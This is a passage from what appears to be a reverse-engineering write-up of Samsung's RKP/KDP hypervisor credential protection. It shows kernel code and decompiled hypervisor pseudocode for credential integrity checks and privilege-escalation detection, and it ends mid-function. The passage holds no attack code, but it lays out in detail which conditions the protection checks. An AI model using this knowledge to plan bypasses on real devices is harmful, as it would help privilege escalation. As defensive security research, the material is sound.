printk(KERN_ERR"\n RKP44 cred = %p bp_task = %p bp_pgd = %p pgd = %llx stat = #%d# task = %p mm = %p \n",cred,cred->bp_task,cred->bp_pgd,pgd,(int)rkp_ro_page((unsigned long long)cred),current,current->mm);
//printk(KERN_ERR"\n RKP44_1 uid = %d gid = %d euid = %d egid = %d \n",(u32)cred->uid,(u32)cred->gid,(u32)cred->euid,(u32)cred->egid);
printk(KERN_ERR"\n RKP44_2 Cred %llx #%d# #%d# Sec ptr %llx #%d# #%d#\n",(u64)cred,rkp_ro_page((u64)cred),rkp_ro_page((u64)cred+sizeof(struct cred)),(u64)cred->security, rkp_ro_page((u64)cred->security),rkp_ro_page((u64)cred->security+sizeof(struct task_security_struct)));
}
/* Main function to verify cred security context of a process */
int security_integrity_current(void)
{
rcu_read_lock();
if ( rkp_cred_enable &&
(rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
cmp_sec_integrity(current_cred(),current->mm)||
cmp_ns_integrity())) {
rkp_print_debug();
rcu_read_unlock();
panic("RKP CRED PROTECTION VIOLATION\n");
}
rcu_read_unlock();
return 0;
}
unsigned int rkp_get_task_sec_size(void)
{
return sizeof(struct task_security_struct);
}
unsigned int rkp_get_offset_bp_cred(void)
{
return offsetof(struct task_security_struct,bp_cred);
}
We can see that `security_integrity_current` does the following checks:

- the `cred` and `task_security_struct` are not `init`'s;
- the `cred` and `task_security_struct` are located in a RO page;
- the back-pointer of the `task_security_struct` points to the `cred`;
- the back-pointer of the `cred` points to the current `task_struct`;
- the back-pointer PGD of the `cred` isn't `swapper_pg_dir`;
- the back-pointer PGD of the `cred` is the PGD of the current `mm_struct`;
- (it also calls `cmp_ns_integrity` to do similar checks on the mount namespace).

As mentioned previously, the kernel will need to call RKP each time it wants to modify the `struct cred` of a process. RKP will do some verifications before carrying out the kernel's requests. And to do these verifications, it needs to know the offsets of various fields of the `struct task_struct` and `struct cred` structures.
On the kernel side, the command is sent in kdp_init
from init/main.c
.
// from init/main.c
void kdp_init(void)
{
kdp_init_t cred;
cred.credSize = sizeof(struct cred);
cred.sp_size = rkp_get_task_sec_size();
cred.pgd_mm = offsetof(struct mm_struct,pgd);
cred.uid_cred = offsetof(struct cred,uid);
cred.euid_cred = offsetof(struct cred,euid);
cred.gid_cred = offsetof(struct cred,gid);
cred.egid_cred = offsetof(struct cred,egid);
cred.bp_pgd_cred = offsetof(struct cred,bp_pgd);
cred.bp_task_cred = offsetof(struct cred,bp_task);
cred.type_cred = offsetof(struct cred,type);
cred.security_cred = offsetof(struct cred,security);
cred.usage_cred = offsetof(struct cred,use_cnt);
cred.cred_task = offsetof(struct task_struct,cred);
cred.mm_task = offsetof(struct task_struct,mm);
cred.pid_task = offsetof(struct task_struct,pid);
cred.rp_task = offsetof(struct task_struct,real_parent);
cred.comm_task = offsetof(struct task_struct,comm);
cred.bp_cred_secptr = rkp_get_offset_bp_cred();
cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
cred.selinux.ss_initialized_va = (u64)&ss_initialized;
#endif
uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}
asmlinkage __visible void __init start_kernel(void)
{
// ...
if (rkp_cred_enable)
kdp_init();
cred_init();
// ...
}
On the hypervisor side, the command is handled in rkp_cmd_cred_init
, which calls rkp_cred_init
.
int64_t rkp_cmd_cred_init(saved_regs_t* regs) {
uh_log('L', "rkp.c", 399, "KDP_KDP About to call cred_init ");
rkp_cred_init(regs);
return 0;
}
void rkp_cred_init(saved_regs_t* regs) {
// ...
rkp_cred = malloc(0xF0, 0);
cred = rkp_get_pa(regs->x2);
if (cred_inited == 1) {
uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
return;
}
cred_inited = 1;
credSize = cred->credSize;
sp_size = cred->sp_size;
uid_cred = cred->uid_cred;
euid_cred = cred->euid_cred;
gid_cred = cred->gid_cred;
egid_cred = cred->egid_cred;
usage_cred = cred->usage_cred;
bp_pgd_cred = cred->bp_pgd_cred;
bp_task_cred = cred->bp_task_cred;
type_cred = cred->type_cred;
security_cred = cred->security_cred;
bp_cred_secptr = cred->bp_cred_secptr;
if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
security_cred > credSize || bp_cred_secptr > sp_size) {
uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
return;
}
rkp_cred->CRED_SIZE = cred->credSize;
rkp_cred->SP_SIZE = sp_size;
rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
rkp_cred->CRED_USE_CNT = usage_cred >> 3;
rkp_cred->VERIFIED_BOOT_STATE = 0;
vbs_va = cred->verifiedbootstate;
if (vbs_va) {
vbs_pa = check_and_convert_kernel_input(vbs_va);
if (vbs_pa != 0) {
rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
}
}
rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}
`rkp_cred_init` does the following:

- allocates the `rkp_cred` structure that will contain all the offsets;
- copies the offsets given by the kernel, after ensuring they are within the corresponding structure sizes, into the `rkp_cred` structure;
- stores the verified boot state (whether `verifiedbootstate` is "orange");
- stores the physical address of `ss_initialized` (is SELinux initialized).

When the kernel wants to update the PGD of a struct task_struct
. On the kernel side, this mainly happens when a process is being copied.
// from fs/exec.c
static int exec_mmap(struct mm_struct *mm)
{
// ...
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
}
// ...
}
// from kernel/fork.c
void rkp_assign_pgd(struct task_struct *p)
{
u64 pgd;
pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);
uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
// ...
if(rkp_cred_enable)
rkp_assign_pgd(p);
// ...
}
rkp_cmd_pgd_assign
calls rkp_pgd_assign
.
int64_t rkp_cmd_pgd_assign(saved_regs_t* regs) {
rkp_pgd_assign(regs);
return 0;
}
int64_t rkp_phys_map_verify_cred(uint64_t cred) {
// ...
if (!cred)
return 1;
if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE)
return 1;
rkp_phys_map_lock(cred);
if (!is_phys_map_cred(cred)) {
uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
rkp_phys_map_unlock(cred);
return 1;
}
rkp_phys_map_unlock(cred);
return 0;
}
void rkp_pgd_assign(saved_regs_t* regs) {
// ...
cred = rkp_get_pa(regs->x2);
pgd = regs->x3;
if (rkp_phys_map_verify_cred(cred)) {
uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !! %lx %lx %lx", cred, regs->x2, pgd);
return;
}
*(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}
`rkp_pgd_assign` checks that the `struct cred` is indeed marked as `CRED` in the physmap, before updating the `bp_pgd` field of the `struct cred`.
Similarly to the previous command, when the kernel needs to change the security
field of the struct cred
, it will call RKP. This happens when the struct cred
is being freed.
// from security/selinux/hooks.c
int rkp_from_tsec_jar(unsigned long addr)
{
static void *objp;
static struct kmem_cache *s;
static struct page *page;
objp = (void *)addr;
if(!objp)
return 0;
page = virt_to_head_page(objp);
s = page->slab_cache;
if(s && s->name) {
if(!strcmp(s->name,"tsec_jar")) {
return 1;
}
}
return 0;
}
int chk_invalid_kern_ptr(u64 tsec)
{
return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}
void rkp_free_security(unsigned long tsec)
{
if(!tsec ||
chk_invalid_kern_ptr(tsec))
return;
if(rkp_ro_page(tsec) &&
rkp_from_tsec_jar(tsec)){
kmem_cache_free(tsec_jar,(void *)tsec);
}
else {
kfree((void *)tsec);
}
}
static void selinux_cred_free(struct cred *cred)
{
// ...
if (rkp_ro_page((unsigned long)cred)) {
uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
}
// ...
rkp_free_security((unsigned long)tsec);
// ...
}
rkp_cmd_cred_set_security
calls rkp_cred_set_security
.
int64_t rkp_cmd_cred_set_security(saved_regs_t* regs) {
rkp_cred_set_security(regs);
return 0;
}
int64_t* rkp_cred_set_security(saved_regs_t* regs) {
// ...
cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
if (!is_phys_map_cred(cred))
return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
security = rkp_get_pa(regs->x2);
*security = 7;
return security;
}
`rkp_cred_set_security` checks that the address it was given indeed belongs to a `struct cred` (marked as `CRED` in the physmap), before setting the `security` field of the `struct cred` to 7 (a poison value).
When a process makes an `execve` syscall, extra checking is performed.
// from fs/exec.c
#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)
#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)
#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
x->cred->suid.val == 0 || x->cred->sgid.val == 0)
static int rkp_restrict_fork(struct filename *path)
{
struct cred *shellcred;
if (!strcmp(path->name, "/system/bin/patchoat") ||
!strcmp(path->name, "/system/bin/idmap2")) {
return 0;
}
/* If the Process is from Linux on Dex,
then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
if(rkp_is_lod(current)){
return 0;
}
#endif
if(rkp_is_nonroot(current)){
shellcred = prepare_creds();
if (!shellcred) {
return 1;
}
shellcred->uid.val = 2000;
shellcred->gid.val = 2000;
shellcred->euid.val = 2000;
shellcred->egid.val = 2000;
commit_creds(shellcred);
}
return 0;
}
SYSCALL_DEFINE3(execve,
const char __user *, filename,
const char __user *const __user *, argv,
const char __user *const __user *, envp)
{
struct filename *path = getname(filename);
int error = PTR_ERR(path);
if(IS_ERR(path))
return error;
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
}
if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
if(rkp_restrict_fork(path)){
pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
"PPID = %d(%s)\n",
current->pid, current->comm,
current->parent->pid, current->parent->comm);
putname(path);
return -EACCES;
}
}
putname(path);
return do_execve(getname(filename), argv, envp);
}
The kernel will call RKP, passing it the executable path, to flag the process by setting the type
field of the struct cred
. It also calls rkp_restrict_fork
if the current task executes as root.
`rkp_restrict_fork` does the following:

- if the executable is `patchoat` or `idmap2`, it allows it;
- if the process is from Linux on Dex (checked using `rkp_is_lod`), it allows it;
- if the process is flagged as non-root (checked using `rkp_is_nonroot`), it downgrades its credentials to the shell user (uid/gid/euid/egid 2000) before committing them.
calls rkp_mark_ppt
.
int64_t rkp_cmd_mark_ppt(saved_regs_t* regs) {
rkp_mark_ppt(regs);
return 0;
}
void rkp_mark_ppt(saved_regs_t* regs) {
// ...
current_va = rkp_ns_get_current();
current_pa = rkp_get_pa(current_va);
current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
name_va = regs->x2;
name_pa = rkp_get_pa(name_va);
if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
}
if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
!strcmp(name_pa, "/system/bin/app_process64")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
}
if (!strcmp(name_pa, "/system/bin/nst"))
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
if (!strcmp(name_pa, "/system/bin/idmap2"))
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
if (!strcmp(name_pa, "/system/bin/patchoat"))
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}
rkp_mark_ppt does the following:

- if the current task is executing adbd, app_process32 or app_process64, it sets on its cred the flag CRED_FLAG_MARK_PPT (4);
- if the current task is executing nst, it sets on its cred the flag CRED_FLAG_LOD (8, checked by rkp_is_lod);
- if the current task is executing idmap2 or patchoat, it unsets from its cred the flag CRED_FLAG_CHILD_PPT (2, checked by rkp_is_nonroot).

This command is the heart of KDP. It is called when the kernel needs to assign a struct cred to a struct task_struct and does extensive checking to detect privilege escalations.
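As a reminder, KDP extends struct cred with a few extra fields that are referenced throughout the code below. The field names match the kernel snippets in this post, but the exact layout and types shown here are an approximate sketch, not the verbatim Samsung definition:

```c
// Approximate sketch of the extra KDP fields appended to struct cred
// (field names appear in the kernel snippets below; layout/types are assumptions).
struct cred {
    /* ... standard fields: uid, gid, euid, egid, ..., security, ... */
    atomic_t *use_cnt;            /* usage counter, living outside the read-only page */
    struct task_struct *bp_task;  /* back pointer to the owning task_struct */
    void *bp_pgd;                 /* back pointer to the owning task's PGD */
    unsigned long long type;      /* KDP flags: CRED_FLAG_CHILD_PPT, CRED_FLAG_MARK_PPT, CRED_FLAG_LOD, ... */
} __randomize_layout;
```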
On the kernel side, copy_creds
, commit_creds
and override_creds
will call prepare_ro_creds
instead of simply setting the cred
field of the struct task_struct
.
prepare_ro_creds does the following:

- it allocates a read-only struct cred (from the cred_jar_ro cache) along with a usage counter (from the usecnt_jar cache);
- it allocates a read-only struct task_security_struct (from the tsec_jar cache);
- it calls RKP (command RKP_KDP_X46), passing it the struct cred that the kernel wanted to assign, the new allocations and the command type;
- it verifies that RKP has correctly filled the back pointers and fields of the read-only struct cred, and panics if it hasn't;
- finally, prepare_ro_creds returns the RO struct cred which gets assigned.

// from include/linux/cred.h
typedef struct cred_param{
struct cred *cred;
struct cred *cred_ro;
void *use_cnt_ptr;
void *sec_ptr;
unsigned long type;
union {
void *task_ptr;
u64 use_cnt;
};
}cred_param_t;
enum {
RKP_CMD_COPY_CREDS = 0,
RKP_CMD_CMMIT_CREDS,
RKP_CMD_OVRD_CREDS,
};
#define override_creds(x) rkp_override_creds(&x)
#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do { \
cred_param.cred = crd; \
cred_param.cred_ro = crd_ro; \
cred_param.use_cnt_ptr = uptr; \
cred_param.sec_ptr= tsec; \
cred_param.type = rkp_cmd_type; \
cred_param.use_cnt = (u64)rkp_use_cnt; \
} while(0)
// from kernel/cred.c
static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
struct cred *new_ro;
void *use_cnt_ptr = NULL;
void *rcu_ptr = NULL;
void *tsec = NULL;
cred_param_t cred_param;
new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
if (!new_ro)
panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);
use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
if (!use_cnt_ptr)
panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);
rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;
tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
if (!tsec)
panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);
rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
if (kdp_cmd == RKP_CMD_COPY_CREDS) {
if ((new_ro->bp_task != (void *)p)
|| new_ro->security != tsec
|| new_ro->use_cnt != use_cnt_ptr) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
}
}
else {
if ((new_ro->bp_task != current)||
(current->mm
&& new_ro->bp_pgd != (void *)pgd) ||
(new_ro->security != tsec) ||
(new_ro->use_cnt != use_cnt_ptr)) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
}
}
rocred_uc_set(new_ro, 2);
set_cred_subscribers(new_ro, 0);
get_group_info(new_ro->group_info);
get_uid(new_ro->user);
get_user_ns(new_ro->user_ns);
#ifdef CONFIG_KEYS
key_get(new_ro->session_keyring);
key_get(new_ro->process_keyring);
key_get(new_ro->thread_keyring);
key_get(new_ro->request_key_auth);
#endif
validate_creds(new_ro);
return new_ro;
}
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
// ...
/*
* Disabling cred sharing among the same thread group. This
* is needed because we only added one back pointer in cred.
*
* This should NOT in any way change kernel logic, if we think about what
* happens when a thread needs to change its credentials: it will just
* create a new one, while all other threads in the same thread group still
* reference the old one, whose reference counter decreases by 2.
*/
if(!rkp_cred_enable){
// ...
}
// ...
if(rkp_cred_enable){
p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
put_cred(new);
}
else {
p->cred = p->real_cred = get_cred(new);
alter_cred_subscribers(new, 2);
validate_creds(new);
}
// ...
}
int commit_creds(struct cred *new)
{
if (rkp_ro_page((unsigned long)new))
BUG_ON((rocred_uc_read(new)) < 1);
else
// ...
if(rkp_cred_enable) {
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);
rcu_assign_pointer(task->real_cred, new_ro);
rcu_assign_pointer(task->cred, new_ro);
}
else {
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
}
// ...
if (rkp_cred_enable){
put_cred(new);
put_cred(new);
}
// ...
}
const struct cred *rkp_override_creds(struct cred **cnew)
{
// ...
struct cred *new = *cnew;
// ...
if(rkp_cred_enable) {
volatile unsigned int rkp_use_count = rkp_get_usecount(new);
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
*cnew = new_ro;
rcu_assign_pointer(current->cred, new_ro);
put_cred(new);
}
else {
get_cred(new);
alter_cred_subscribers(new, 1);
rcu_assign_pointer(current->cred, new);
}
// ...
}
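Note the override_creds macro shown earlier: since it expands to rkp_override_creds(&x), the caller's own pointer is silently swapped for the read-only copy. A hypothetical caller (not taken from the Samsung sources) would look like this:

```c
/* Hypothetical caller: because override_creds(x) expands to
 * rkp_override_creds(&x), the local variable is replaced with the
 * read-only struct cred allocated through prepare_ro_creds/RKP. */
static void example_do_privileged_work(void)
{
    const struct cred *old;
    struct cred *cred = prepare_creds();   /* writable working copy */
    if (!cred)
        return;
    cred->fsuid = GLOBAL_ROOT_UID;         /* tweak the working copy */
    old = override_creds(cred);            /* cred now points to the RO copy */
    /* ... perform the privileged operation ... */
    revert_creds(old);
    put_cred(cred);
}
```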
On the hypervisor side, rkp_cmd_assign_creds
calls rkp_assign_creds
.
int64_t rkp_cmd_assign_creds(saved_regs_t* regs) {
rkp_assign_creds(regs);
return 0;
}
uint64_t rkp_ns_get_current() {
if (get_sp_sel())
return get_sp_el0();
return get_sp();
}
int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
return curr_id > 1000 && targ_id <= 1000;
}
bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
// ..
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
if (check_pe_id(targ_uid, curr_uid))
return 1;
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
if (check_pe_id(targ_gid, curr_gid))
return 1;
  curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid))
return 1;
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid))
return 1;
return 0;
}
int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
// ...
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((curr_flags & 2) != 0)
return 1;
task = curr_task;
while (1) {
task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
if (!task_pid)
return 0;
task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
memcpy(comm, task_comm, sizeof(comm));
if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd"))
return 1;
parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
task = parent_pa = rkp_get_pa(parent_va);
}
}
int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}
bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
return ((curr_id - 0x61A80000) <= 0xFFFF && (targ_id - 0x61A80000) > 0xFFFF && targ_id != -1);
}
int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
rkp_phys_map_lock(sec_ptr);
if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
rkp_phys_map_unlock(sec_ptr);
return 1;
}
rkp_phys_map_unlock(sec_ptr);
return 0;
}
void rkp_assign_creds(saved_regs_t* regs) {
// ...
cred_param = rkp_get_pa(regs->x2);
if (!cred_param) {
uh_log('L', "rkp_kdp.c", 662, "NULL pData");
return;
}
curr_task_va = rkp_ns_get_current();
curr_task = rkp_get_pa(curr_task_va);
curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
curr_cred = rkp_get_pa(curr_cred_va);
targ_cred = rkp_get_pa(cred_param->cred);
targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
curr_secptr = rkp_get_pa(curr_secptr_va);
if (!curr_cred) {
uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
}
if (!curr_secptr && rkp_deferred_inited) {
uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
}
bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1 %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
return;
}
if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
return;
}
skip_checks = 0;
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
if ((curr_flags & 8) == 0) {
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
if ((curr_uid & 0xFFFF0000) != 0x61A80000 && (curr_euid & 0xFFFF0000) != 0x61A80000 &&
(curr_gid & 0xFFFF0000) != 0x61A80000 && (curr_egid & 0xFFFF0000) != 0x61A80000) {
if (!rkp_cred->VERIFIED_BOOT_STATE) {
if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
*(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
        return rkp_privilege_escalation(targ_cred, curr_cred, 1);
}
}
skip_checks = 1;
} else {
*(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
}
}
if (!skip_checks) {
targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
if (targ_uid != 3003) {
      curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
if (check_privilege_escalation(targ_uid, curr_uid)) {
uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
targ_uid);
priv_esc = 1;
}
}
targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
if (targ_euid != 3003) {
      curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
if (check_privilege_escalation(targ_euid, curr_euid)) {
uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
targ_euid);
priv_esc = 1;
}
}
targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
if (targ_gid != 3003) {
      curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
if (check_privilege_escalation(targ_gid, curr_gid)) {
uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
targ_gid);
priv_esc = 1;
}
}
targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
if (targ_egid != 3003) {
      curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
if (check_privilege_escalation(targ_egid, curr_egid)) {
uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
targ_egid);
priv_esc = 1;
}
}
if (priv_esc) {
uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx ", targ_cred);
if (curr_task) {
curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
uh_log('L', "rkp_kdp.c", 707, curr_comm);
}
      return rkp_privilege_escalation(targ_cred, curr_cred, 1);
}
}
